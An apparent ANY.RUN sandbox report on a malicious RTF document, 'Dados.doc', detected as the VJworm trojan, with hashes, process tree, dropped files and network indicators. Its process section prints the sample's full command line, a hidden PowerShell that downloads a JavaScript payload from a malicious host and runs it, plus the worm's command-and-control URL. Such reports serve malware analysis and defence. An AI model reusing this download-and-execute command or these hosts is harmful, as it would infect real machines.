analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dados.doc

Full analysis: https://app.any.run/tasks/6f5a68e2-848c-40d5-95d1-0e4ea3159294
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: December 03, 2019, 01:47:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
trojan
vjworm
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

BA6DC04E8CFF6410DA747A5593EB7C26

SHA1:

869904825597E4F6382300DE088E818C5D24B7ED

SHA256:

309E22CA759D8DB0F6FB5B1B55E09AF56F76A5A7F5608424711597B26969AAEE

SSDEEP:

3072:qxpgJTiMUzb+bgJTiMUzb++gJTiMUzb+u9y:XJTiMUPnJTiMUPoJTiMUPpy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3248)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3248)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 1784)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1784)
    • VJWORM was detected

      • WScript.exe (PID: 460)
    • Connects to CnC server

      • WScript.exe (PID: 460)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 3248)
      • EXCEL.EXE (PID: 3460)
      • EXCEL.EXE (PID: 3932)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 1784)
    • Creates files in the user directory

      • powershell.exe (PID: 3452)
    • Executes scripts

      • powershell.exe (PID: 3452)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2712)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2712)
      • EXCEL.EXE (PID: 3248)
      • EXCEL.EXE (PID: 3932)
      • EXCEL.EXE (PID: 3460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 85
CharactersWithSpaces: 117
Characters: 100
Words: 18
Pages: 1
TotalEditTime: 1 minute
RevisionNumber: 1
ModifyDate: 2019:12:02 11:55:00
CreateDate: 2019:12:02 11:54:00
LastModifiedBy: Gomez
Author: Gomez
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs cmd.exe no specs taskkill.exe no specs excel.exe no specs taskkill.exe no specs excel.exe no specs ping.exe no specs powershell.exe #VJWORM wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2712"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Dados.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
3248"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1784C:\Windows\system32\cmd.exe /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://3030pp.sslblindado.com/nice','%TEMP%\Inject.js');Start-Process '%TEMP%\Inject.js'C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1028taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3460"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
3316taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3932"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2868ping -n 3 localhost C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3452PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://3030pp.sslblindado.com/nice','C:\Users\admin\AppData\Local\Temp\Inject.js');Start-Process 'C:\Users\admin\AppData\Local\Temp\Inject.js'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
460"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Inject.js" C:\Windows\System32\WScript.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
1 223
Read events
991
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
5

Dropped files

PID
Process
Filename
Type
2712WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr
MD5:
SHA256:
3248EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB272.tmp.cvr
MD5:
SHA256:
3248EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFEFB14643B1087BB7.TMP
MD5:
SHA256:
3460EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB89C.tmp.cvr
MD5:
SHA256:
3932EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRBADE.tmp.cvr
MD5:
SHA256:
3452powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TPKI8A1H5LJ1A8M8WS1P.temp
MD5:
SHA256:
2712WINWORD.EXEC:\Users\admin\Desktop\~$dos.doc.rtfpgc
MD5:C2F6E3F6124AE7F1D2DDCF66580E1D17
SHA256:369B68972CB5786EFF9282679741747B076EED9783B32607D440D937783367D7
2712WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:75B1C22F4F1552E6473C377C647FA1D7
SHA256:E92E9C9622C7EABAB46B6C5F57A36FF1F3C79B235062C68BE9E255BC3BC0067F
3452powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39c51f.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2712WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E672051C-6129-4CE7-94E9-BB58DC41F1F6}.tmpbinary
MD5:BE8C767FB30297ECBC178CCA06D68706
SHA256:5B5F37957716E7BD2AD2E31678ACA61D09227EADE28B43EA461D77675F5092C0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
460
WScript.exe
POST
177.126.146.27:7974
http://3030pp.hopto.org:7974/Vre
BR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3452
powershell.exe
187.17.111.98:443
3030pp.sslblindado.com
Universo Online S.A.
BR
malicious
460
WScript.exe
177.126.146.27:7974
3030pp.hopto.org
Firemicro Informática
BR
malicious

DNS requests

Domain
IP
Reputation
3030pp.sslblindado.com
  • 187.17.111.98
malicious
3030pp.hopto.org
  • 177.126.146.27
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.hopto .org
460
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] VJworm activity
460
WScript.exe
A Network Trojan was detected
MALWARE [PTsecurity] vjw0rm
460
WScript.exe
Potentially Bad Traffic
ET INFO HTTP Connection To DDNS Domain Hopto.org
3 ETPRO signatures available at the full report
No debug info